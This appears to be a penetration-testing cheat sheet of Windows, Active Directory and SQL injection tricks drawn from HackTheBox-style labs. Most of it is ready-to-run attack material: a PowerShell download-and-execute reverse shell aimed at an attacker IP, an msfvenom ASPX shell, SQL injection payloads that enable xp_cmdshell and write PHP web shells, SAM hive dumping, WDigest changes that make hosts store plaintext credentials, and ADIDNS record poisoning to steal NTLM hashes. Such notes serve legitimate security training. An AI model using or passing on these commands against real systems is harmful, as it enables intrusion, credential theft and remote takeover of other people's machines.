Tricks and Tips
Lateral Movement techniques - https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/
Sql Injection cheatsheet - https://www.websec.ca/kb/sql_injection
Windows directory file extensions are lowercase
Windows IIS deualt path is
c:/inetpub/wwwroot/Always use ffuf for fuzzing files and use gobuster for fuzzing directories
If local privilege escalation exists on windows system for services listening on internal port and exploit is written in python or bash forward that service port and run the exploit in kali.
In active directory environment if we want to pivot to internal windows host from a compromised windows host check if you can receive reverse connection on attacking host on port 53 since AD is usually configured to allow DNS port 53 to communicate to external hosts. eg:
After creating powershell credential object.
Invoke-Command -Computer internal.host.local -Credential $cred -ScriptBlock { tcp-one-liner-from-nishang }Identify active hosts on network
sudo nmap -sn <address>/24sudo netdiscover -i <interface>sudo arp-scan --localnet -I <interface>
Enumerating windows version,hostname,domain
sudo smbmap -H <ip> -vsudo crackmapexec smb <ip>Nmap ports scan at faster rate
sudo masscan -p1-65535 10.10.174.58 --rate 10000 -e tun0Nmap tcp connect scan
nmap -sT -p- --min-rate 5000 <host>After this run nmap on individual found ports
Nmap udp verbose scan
nmap -sUV -T4 <ip>Wordpress verberose scan
wpscan --url sandbox.local --enumerate ap,at,cb,dbeTo find install locations of programs
whereis apache2Find where log files are located in linux hosts(access.log and error.log)
httpd.conf file in apache tells us where the log files are located so if we donot find log files in default location try getting httpd.conf file Error clock skew too great
ntpdate <IP of DC or machine to sync with>If powershell reverseshell doesn't work convert it to windows base64 and try executing
Since windows does everything in UTF-16 little endian we need to convert our execution code and then base64 it.
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1')" | iconv --to-code UTF-16LE | base64 -w 0Adding DNS entry in AD environment for stealing ntlm hashes
There is something in Active Directory called ADIDNS(Active Directory INtegrated Dns) where AD users can configure computer account objects which they control to point to an arbitary IP address. Now this feature can be leveraged if an attacker who has compromised a regular domain user adds DNS A record ( also known as Address record which indicates ip address of a given domain ) to point to address where responder is listening and if someone visits the address or some script is setup by IT team to check if all the web sites in the AD are up abd running as in intelligence box from hackthebox as shown below.
��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves
Ted.Graves@intelligence.htb
' -To 'Ted Graves
Ted.Graves@intelligence.htb
' -Subject "Host: $($record.Name) is down" } } catch {} }Here an attacker who has a regular domain user compromised can add DNS A record pointing to his ip address where responder is listening and since the above script setup by the IT team checks all dns web domains using Invoke-WebRequest their NTLM hash can be stolen. For this we can use https://github.com/Sagar-Jangam/DNSUpdate
python3 DNSUpdate.py -DNS <DC-IP> -u 'htb.local\<username>' -p <password> -a ad -r webalex -d <attacker-ip>Enabling PS-Remoting
Having an elavated powershell prompt on victim host we can force powershell to work with winrm.
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *Activating winrm remotely
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"Activating winrm remotely from linux
python3 psexec.py <domain>/<username>:<password>@<DC-ip> 'powershell.exe "Enable-PSRemoting -Force"'Creating powershell credential object
$username = '<username>'
$password = '<password>'
$secureStringPass = $password | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $secureStringPassMoving laterally to another computer on domain
Enter-PSSession -ComputerName <computer-name> -Credential <credential created from ps credential object>Windows shell upload via website
If the windows host is running IIS service and we can upload in any location in the web we may be able to upload an aspx reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx anything.aspxDecrypt Powershell SecureString password
$password = '01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e1'
[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR( (ConvertTo-SecureString $password) ))If we need to transfer binary or executable file via ftp we should always use
binarycommand first then enter put file.exe
If mimikatz doesn't work on the host we can save the sam,system and security hive transfer it to our attacking machine via smb and use secretsdump.py to extract all hashes
reg save hklm\sam c:\windows\temp\sam.save
reg save hklm\security c:\windows\temp\security.save
reg save hklm\system c:\windows\temp\system.saveWindows can execute executable files directly from UNC path
cmd /c \\192.168.119.233\hello\shell.exeThis gets directly executed
To perform tcp port scan On old linux systems where nmap does not run(May need to run more than once to filter good results)
nc -w 1 -zv <ip> 1-65535 2>&1 | grep succeededTo perform udp port scan on old linux where nmap does not work(May need to run more than once to filter good results)
nc -w 2 -v -u <ip> 1-65535 2>&1 | grep succeededChange smb password remotely from linux
smbpasswd -r 10.10.10.193 -U tlavelBypass UAC
fodhelper powershell script can be used to bypass UAC only if our compromised user is member of administrator group
Powershell Command History file location
\AppData\Roaming\Microsoft\Windows\Powershell\If powershell errors during execution of PrivEsc scripts(eg: Access to the path is denied, operation might require other privileges, etc)
check if the running reverse shell is 64 bit process if the host is 64 bit and 32 bit process if the shell is 32 bit process
[environment]::Is64BitOperatingSystem[environment]::Is64BitProcessIF host is 64 bit and our process is 32 bit or vice versa make sure to catch the reverse shell via
C:\WINDOWS\System32\WindowsPowerShell\v1. 0\powershell.exe ...
or upload nc64 to the host and catch the reverse shell or get cmd reverse shell and launch 64 bit powershell from there.
Hashcat with salt
In the hash file put the format as hash:salt instead of only the hash.
MSSQL configuring xp_cmdshell if not enabled
';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure 'xp_cmdshell', 1;--
';RECONFIGURE;--MSSQL Injection xp_cmdshell RCE
';EXEC xp_cmdshell 'ping 10.10.14.9';MSSQL Injection capture credentials when xp_cmdshell doesnot work
';EXEC master..xp_dirtree '\\10.10.14.10\share',1,1;--MySql Injection RCE in windows when smb is running:
'+UNION+SELECT+NULL,NULL,NULL,NULL,load_file('\\\\10.10.14.9\\share\\reverse-shell.php'),NULL--MySql injection php wrapper trick
'+UNION+SELECT+NULL,NULL,NULL,NULL,'data://text/plain,<?php+echo+system("whoami")?>',NULL--MySql Injection OUTFILE RCE:
union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/rev-shell.php'MySql Injection load_file() read system files
' UNION SELECT NULL,NULL,NULL,load_file('/etc/passwd');--Wireshark Group
If our compromised user is in (wireshark) group we can sniff any packets on any available interfaces of the comrpomised host. Below we are sniffing on loopback interface and saving the file as test.pcap
[alex@websrv01 ~]$ id
uid1002(alex) gid=1002(alex) groups=1002(alex), 994(wireshark)
[alex@websrv01 ~]$ dumpcap -i lo -w test.pcapEnabling WDigest authentication to force system to store credentials in plaintext so that next time some employee logs in their creds will get cached in memory
This technique is usually applied to real world red teaming
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1Sqlmap force ssl
Use --force-ssl flag in sqlmap if you are attacking web application using https
sqlmap -u 'https://vulnerable-site.com/index.php?id=1' --force-sslShell as another user on windows host
If we have low privilege access on a windows host and we get credentials or another user or administrator but port 445 is closed externally and we cannot psexec, winrm, rdp or other services are also closed, Enter-PSSession or Invoke-Command -ComputerName didnot work RunasCs or runas.exe also did not work there are another two ways
First Way
We can create a powershell credential object for that user using their password and use Start-Process in powershell with powershell reverse shell to get reverse shell as that user. In compromised host create powershell credential object for that user
$SecPass = ConvertTo-SecureString 'FoundPassword@123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$SecPass)Now convert Invoke-PowerShellTcpOneLine.ps1 with your ip and port and convert this file to windows base64
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0Finally we can start powershell process with our reverse shell in the context of administrator or the found user as
Start-Process -filepath powershell -argumentlist "-enc JABzAG0APQAoAE4AZQ..." -credential $credWe will receive reverse shell as the compromised user.
Second Way
If port 445, winrm, rdp, or any such port from where we can gain access is listening internally we can forward that port to our local machine and execute psexec.py or evil-winrm, or rdp to get reverse shell or access as another user.
Last updated